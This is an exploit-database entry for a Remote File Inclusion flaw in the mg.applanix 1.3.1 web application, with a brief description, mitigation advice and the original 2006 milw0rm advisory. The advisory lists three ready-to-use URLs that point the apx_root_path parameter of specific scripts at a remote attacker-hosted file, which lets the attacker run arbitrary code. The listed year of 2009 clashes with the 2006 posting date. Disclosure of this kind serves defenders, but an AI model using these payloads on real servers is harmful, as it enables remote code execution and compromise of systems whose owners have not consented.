mg.applanix (RFI)

vendor:

mg.applanix

by:

v1per-haCker

9,3

CVSS

HIGH

Remote File Inclusion (RFI)

CWE

Product Name: mg.applanix

Affected Version From: 1.3.1

Affected Version To: 1.3.1

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

The mg.applanix version 1.3.1 is vulnerable to Remote File Inclusion (RFI) vulnerability. An attacker can exploit this vulnerability by sending a malicious URL in the 'apx_root_path' parameter of the vulnerable scripts. This can allow the attacker to execute arbitrary code on the vulnerable server.

Mitigation:

The best way to mitigate RFI is to restrict the access to the vulnerable scripts. The user input should be validated and filtered properly. The web application should be kept up-to-date with the latest security patches.

Source

Exploit-DB raw data:

#########################################################################################
###################################v1per-haCker##########################################
######################How I Can lives Without FooL Programmer!###########################
#########################################################################################
#=======================================================================================#
#___________________________________mg.applanix (RFI)___________________________________#
#=======================================================================================#
# Information:-										#
#											#
# Scripts: mg.applanix									#
# download : http://freshmeat.net/redir/applanix/38915/url_zip/mg.applanix_1.3.1.zip	#
# Version : 1.3.1									#
# Dork & vuln : download script and think :)						#
#											#
#=======================================================================================#
# Exploit :										#
#											#
#http://localhost/path/act/act_check_access.php?apx_root_path=http://EvElCoDe.txt?	#
#http://localhost/path/dsp/dsp_form_booking_ctl.php?apx_root_path=http://EvElCoDe.txt?	#
#http://localhost/path/dsp/dsp_bookings.php?apx_root_path=http://EvElCoDe.txt?		#
#											#
#=======================================================================================#
# Discoverd By : v1per-haCker								#
#											#
# Conatact : v1per-hacker[at]hotmail.com						#
#											#
# XP10_hackEr Team		>>	www.xp10.com					#
# SpeciaL PoweR SecuritY TeaM	>>	www.specialpower.org				#
#											#
# Greetz to :	| abu_shahad | RooT-shilL | hitler_jeddah | BooB11 | FaTaL  | 		#
#		| ThE-WoLf-KsA | mohandko | fooooz | maVen | ShikAa | K3BAB |		#
#		| metoovet | MooB | Dr.7zN | ToOoFA | Cold Zero | Afroota   |		#
#		| MainstreaM | CoDeR | Simo-64 | Super-CrystaL | KoolholiO  | 		#
#		|  MuhaciR  |Skrmhcr-GVinux | Jean | fucker_net | Sir-ToTTi |		#
#	    										#
# Thanks >>	/str0ke	& www.milw0rm.com & www.google.com				#
#=======================================================================================#
#########################################################################################
#################################L0ve is L1fe W0und3r####################################
#########################################################################################

# milw0rm.com [2006-11-17]